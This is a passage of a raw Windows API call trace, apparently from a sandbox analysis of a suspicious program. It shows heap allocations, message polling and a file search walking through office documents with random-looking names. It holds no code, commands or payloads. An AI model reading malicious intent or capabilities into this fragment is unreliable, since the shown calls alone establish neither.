hHeap=0x650000) returned 1 [0073.903] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692d08 | out: hHeap=0x650000) returned 1 [0073.903] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ac0 | out: hHeap=0x650000) returned 1 [0073.903] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b2d0 | out: hHeap=0x650000) returned 1 [0073.903] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.903] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690ac0 [0073.903] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0073.903] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c10 [0073.903] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb0c0 | out: hHeap=0x650000) returned 1 [0073.903] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c10 | out: hHeap=0x650000) returned 1 [0073.903] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ac0 | out: hHeap=0x650000) returned 1 [0073.903] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.903] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690ac0 [0073.903] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0073.903] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c10 [0073.903] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb0c0 | out: hHeap=0x650000) returned 1 [0073.903] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c10 | out: hHeap=0x650000) returned 1 [0073.903] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ac0 | out: hHeap=0x650000) returned 1 [0073.903] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8ab8 [0073.903] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.903] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690ac0 [0073.903] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b2d0 [0073.903] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c10 [0073.904] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0073.904] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b348 [0073.904] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690bc0 [0073.904] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x80) returned 0x6b9a28 [0073.904] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b348 | out: hHeap=0x650000) returned 1 [0073.904] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0073.904] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690b60 [0073.904] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b348 [0073.904] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b300 [0073.904] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690bd0 [0073.904] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb0c0 | out: hHeap=0x650000) returned 1 [0073.904] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b60 | out: hHeap=0x650000) returned 1 [0073.904] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b300 | out: hHeap=0x650000) returned 1 [0073.904] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bd0 | out: hHeap=0x650000) returned 1 [0073.904] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b348 | out: hHeap=0x650000) returned 1 [0073.904] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0073.904] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c10 | out: hHeap=0x650000) returned 1 [0073.904] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ac0 | out: hHeap=0x650000) returned 1 [0073.904] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b9a28 | out: hHeap=0x650000) returned 1 [0073.904] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bc0 | out: hHeap=0x650000) returned 1 [0073.904] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b2d0 | out: hHeap=0x650000) returned 1 [0073.904] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.905] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8ab8 | out: hHeap=0x650000) returned 1 [0073.905] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.905] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690bc0 [0073.905] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bc0 | out: hHeap=0x650000) returned 1 [0073.905] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.905] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690bc0 [0073.905] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de28 [0073.905] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b2d0 [0073.905] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690ac0 [0073.905] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ac0 | out: hHeap=0x650000) returned 1 [0073.905] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbdc053e0, ftCreationTime.dwHighDateTime=0x1d57286, ftLastAccessTime.dwLowDateTime=0x290dce00, ftLastAccessTime.dwHighDateTime=0x1d5aa6f, ftLastWriteTime.dwLowDateTime=0x290dce00, ftLastWriteTime.dwHighDateTime=0x1d5aa6f, nFileSizeHigh=0x0, nFileSizeLow=0xa915, dwReserved0=0x10, dwReserved1=0x657690, cFileName="g_g2urcnwKcCd17PjNc.xlsx", cAlternateFileName="G_G2UR~1.XLS")) returned 1 [0073.905] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b348 [0073.905] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b738 [0073.905] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690ac0 [0073.905] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b2d0 | out: hHeap=0x650000) returned 1 [0073.905] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de28 | out: hHeap=0x650000) returned 1 [0073.905] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bc0 | out: hHeap=0x650000) returned 1 [0073.905] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692e20 | out: hHeap=0x650000) returned 1 [0073.905] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b810 [0073.905] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b738 | out: hHeap=0x650000) returned 1 [0073.905] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ac0 | out: hHeap=0x650000) returned 1 [0073.905] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b348 | out: hHeap=0x650000) returned 1 [0073.905] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.905] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690ac0 [0073.906] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0073.906] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690bc0 [0073.906] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb0c0 | out: hHeap=0x650000) returned 1 [0073.906] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bc0 | out: hHeap=0x650000) returned 1 [0073.906] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ac0 | out: hHeap=0x650000) returned 1 [0073.906] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.906] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690ac0 [0073.906] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0073.906] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690bc0 [0073.906] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb0c0 | out: hHeap=0x650000) returned 1 [0073.906] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bc0 | out: hHeap=0x650000) returned 1 [0073.906] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ac0 | out: hHeap=0x650000) returned 1 [0073.906] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8ab8 [0073.906] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.906] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690ac0 [0073.906] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b348 [0073.906] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690bc0 [0073.906] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0073.906] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b2d0 [0073.906] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c10 [0073.906] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x90) returned 0x6b9a28 [0073.906] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b2d0 | out: hHeap=0x650000) returned 1 [0073.906] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0073.907] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690bd0 [0073.907] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b2d0 [0073.907] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b300 [0073.907] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690b60 [0073.907] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb0c0 | out: hHeap=0x650000) returned 1 [0073.907] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bd0 | out: hHeap=0x650000) returned 1 [0073.907] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b300 | out: hHeap=0x650000) returned 1 [0073.907] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b60 | out: hHeap=0x650000) returned 1 [0073.907] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b2d0 | out: hHeap=0x650000) returned 1 [0073.907] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0073.907] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bc0 | out: hHeap=0x650000) returned 1 [0073.907] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ac0 | out: hHeap=0x650000) returned 1 [0073.907] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b9a28 | out: hHeap=0x650000) returned 1 [0073.907] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c10 | out: hHeap=0x650000) returned 1 [0073.907] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b348 | out: hHeap=0x650000) returned 1 [0073.907] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.907] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8ab8 | out: hHeap=0x650000) returned 1 [0073.907] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.907] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c10 [0073.907] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c10 | out: hHeap=0x650000) returned 1 [0073.907] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.907] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c10 [0073.908] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de28 [0073.908] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b348 [0073.908] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690ac0 [0073.908] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ac0 | out: hHeap=0x650000) returned 1 [0073.908] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb60d02d0, ftCreationTime.dwHighDateTime=0x1d5e110, ftLastAccessTime.dwLowDateTime=0xa4489aa0, ftLastAccessTime.dwHighDateTime=0x1d5e417, ftLastWriteTime.dwLowDateTime=0xa4489aa0, ftLastWriteTime.dwHighDateTime=0x1d5e417, nFileSizeHigh=0x0, nFileSizeLow=0x137a4, dwReserved0=0x10, dwReserved1=0x657690, cFileName="Im NPo61DTLm5sBx.pps", cAlternateFileName="IMNPO6~1.PPS")) returned 1 [0073.908] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b2d0 [0073.908] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e20 [0073.908] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690ac0 [0073.908] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b348 | out: hHeap=0x650000) returned 1 [0073.908] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de28 | out: hHeap=0x650000) returned 1 [0073.908] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c10 | out: hHeap=0x650000) returned 1 [0073.908] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692e20 | out: hHeap=0x650000) returned 1 [0073.908] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ac0 | out: hHeap=0x650000) returned 1 [0073.908] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b2d0 | out: hHeap=0x650000) returned 1 [0073.908] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.909] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690ac0 [0073.909] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0073.909] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c10 [0073.909] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb0c0 | out: hHeap=0x650000) returned 1 [0073.909] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c10 | out: hHeap=0x650000) returned 1 [0073.909] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ac0 | out: hHeap=0x650000) returned 1 [0073.909] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.909] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690ac0 [0073.909] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0073.909] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c10 [0073.909] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb0c0 | out: hHeap=0x650000) returned 1 [0073.909] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c10 | out: hHeap=0x650000) returned 1 [0073.909] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ac0 | out: hHeap=0x650000) returned 1 [0073.909] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8ab8 [0073.909] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.909] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690ac0 [0073.909] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b2d0 [0073.909] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c10 [0073.909] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0073.910] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b348 [0073.910] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690bc0 [0073.910] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x80) returned 0x6b9a28 [0073.910] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b348 | out: hHeap=0x650000) returned 1 [0073.910] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0073.910] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690b60 [0073.910] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b348 [0073.910] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b300 [0073.910] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690bd0 [0073.910] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb0c0 | out: hHeap=0x650000) returned 1 [0073.910] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b60 | out: hHeap=0x650000) returned 1 [0073.910] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b300 | out: hHeap=0x650000) returned 1 [0073.910] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bd0 | out: hHeap=0x650000) returned 1 [0073.910] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b348 | out: hHeap=0x650000) returned 1 [0073.910] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0073.910] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c10 | out: hHeap=0x650000) returned 1 [0073.910] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ac0 | out: hHeap=0x650000) returned 1 [0073.911] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b9a28 | out: hHeap=0x650000) returned 1 [0073.911] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bc0 | out: hHeap=0x650000) returned 1 [0073.911] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.911] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.911] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690bc0 [0073.911] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.911] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690bc0 [0073.911] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de28 [0073.911] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b2d0 [0073.911] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690ac0 [0073.911] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf5249d40, ftCreationTime.dwHighDateTime=0x1d5d056, ftLastAccessTime.dwLowDateTime=0x45d595f0, ftLastAccessTime.dwHighDateTime=0x1d5921d, ftLastWriteTime.dwLowDateTime=0x45d595f0, ftLastWriteTime.dwHighDateTime=0x1d5921d, nFileSizeHigh=0x0, nFileSizeLow=0x1880e, dwReserved0=0x10, dwReserved1=0x657690, cFileName="j0tJZ4pqz2gw.docx", cAlternateFileName="J0TJZ4~1.DOC")) returned 1 [0073.911] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b348 [0073.911] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e20 [0073.911] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690ac0 [0073.911] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.911] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690ac0 [0073.912] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0073.912] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690bc0 [0073.912] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.912] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690ac0 [0073.912] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0073.912] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690bc0 [0073.912] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.912] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690ac0 [0073.912] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b348 [0073.912] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690bc0 [0073.912] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0073.912] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b2d0 [0073.912] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c10 [0073.913] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x80) returned 0x6b9a28 [0073.913] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.913] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.913] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c10 [0073.913] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.913] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c10 [0073.913] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de28 [0073.913] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b348 [0073.913] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690ac0 [0073.913] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a79df10, ftCreationTime.dwHighDateTime=0x1d57a75, ftLastAccessTime.dwLowDateTime=0x111572f0, ftLastAccessTime.dwHighDateTime=0x1d59c76, ftLastWriteTime.dwLowDateTime=0x111572f0, ftLastWriteTime.dwHighDateTime=0x1d59c76, nFileSizeHigh=0x0, nFileSizeLow=0xa7c0, dwReserved0=0x10, dwReserved1=0x657690, cFileName="k55L_7uM1tYjpSGA.pptx", cAlternateFileName="K55L_7~1.PPT")) returned 1 [0073.913] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b2d0 [0073.913] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e20 [0073.913] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690ac0 [0073.913] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.913] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690ac0 [0073.913] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0073.913] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c10 [0073.913] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.913] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690ac0 [0073.913] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0073.913] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c10 [0073.913] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.914] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690ac0 [0073.914] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b2d0 [0073.914] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c10 